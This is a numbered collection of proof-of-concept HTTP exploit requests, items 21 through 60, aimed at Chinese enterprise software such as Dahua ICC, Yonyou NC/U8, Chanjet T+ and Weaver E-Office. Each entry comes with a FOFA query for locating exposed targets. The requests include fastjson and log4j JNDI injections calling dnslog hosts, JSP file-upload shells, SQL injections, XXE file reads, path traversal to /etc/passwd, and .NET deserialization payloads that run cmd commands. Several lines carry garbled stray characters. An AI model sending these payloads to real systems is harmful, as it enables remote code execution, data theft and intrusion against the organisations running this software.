& M2 N. K# I+ k- N2 s+ MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! e5 o# h+ u1 y% n4 tConnection: close1 p+ Q" ]* c7 U  J
Accept: */*2 e: ]+ o9 C. x& {
Accept-Language: en
7 s* @, s0 c4 b. f9 t/ C& [Accept-Encoding: gzip- h& Y) w: u6 V# T% m3 s

9 V# ?1 R# ?$ @7 U$ U5 t- x4 S: M2 {% e& m! a9 `
21. 大华ICC智能物联综合管理平台random远程代码执行: B5 X1 Z! a. V% q1 T
FOFA:icon_hash="-1935899595"4 a/ n) }' e, u- ]& r
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1, A; t+ d0 Q" x; F8 f3 x4 |: b1 r
Host: x.x.x.x+ W( \' j5 d  D3 c$ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 g+ S8 ]% a, `. V( x$ c
Content-Length: 161+ B1 r6 D% c- i. N9 H1 P
Accept-Encoding: gzip* l/ {1 z5 C% f+ y" Q
Connection: close
4 t( i; Z1 p, p# PContent-Type: application/json;charset=utf-8& b! d% c8 [" q* `

5 `# g- W( [6 {& ^, `7 P{( c$ |+ N( b- d- w4 C# U  E
"a":{0 b/ R4 |7 |' z
   "@type":"com.alibaba.fastjson.JSONObject",8 F) L  u' S; _2 R* N% ~6 ?! G; I
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}3 @8 u0 u0 c& ~5 M
  }""
+ _. ^% Q" z1 S. ]6 h+ d' m}8 J: w/ g) U3 \

* C* ~# V6 \! N0 N" i& Y; ]& d+ \- p5 N# T% ?! O: Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
) Z) p$ X/ z) r* }6 F1 ZFOFA:icon_hash="-1935899595"
4 F5 }9 `! W8 f! e; h( l9 L" E* uPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
4 V5 s) S& D6 l. kHost: your-ip' k( ~% K3 G. p5 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* }* m/ ?9 M) [8 B- r, fContent-Type: application/json;charset=utf-8/ p$ ]+ S0 f5 I" E

# \& E* X2 r# T# I$ \7 Y! s{
- S$ m/ J+ @% ~! ~! `: e"loginName":"${jndi:ldap://dnslog}"& H. d- c3 ~4 k- ]/ Y, a1 T
}5 f5 p9 V% y! V) z$ V9 K6 H0 O+ [" `/ t

. d' I! z5 ]/ f, `! q! M# T5 b6 o' b6 j5 V- Y

( g: J+ w) I# e/ ^: U2 w23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 W% v4 S0 @) o1 a/ \
FOFA:icon_hash="-1935899595"
2 ~# O( ^1 W+ O& L% C$ IPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
0 y7 x9 F1 C" f$ l$ \9 r" |Host: your-ip: l1 b& a  j, a( c. Q  c- n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 @3 E+ c  P$ ]' d2 A4 qContent-Type: application/json;charset=utf-8
4 E# P0 z2 s( O% H& T# Y2 n" oAccept-Encoding: gzip
0 ]4 [/ _$ m8 h2 _( f6 F# Y, J4 ]9 \Connection: close8 Y- |+ w0 j. M9 J5 S" h
: L" U# e8 B6 e; v+ g$ p
{
$ K' v( a# c' Y/ D7 C    "a":{1 k0 e; C$ M! V- s! R6 E
        "@type":"com.alibaba.fastjson.JSONObject",
4 e; B# L2 y9 k0 E* d9 o5 x' n       {"@type":"java.net.URL","val":"http://DNSLOG"}2 G+ ~; U  y% f, E
        }""
1 e. d! J2 Q7 r( b# K}
2 F3 h, }; K' ], G! D0 ?* p8 w; ^6 b$ y2 v- B$ z4 K" }

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--


25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}


Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: using the obtained Cookie, request /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
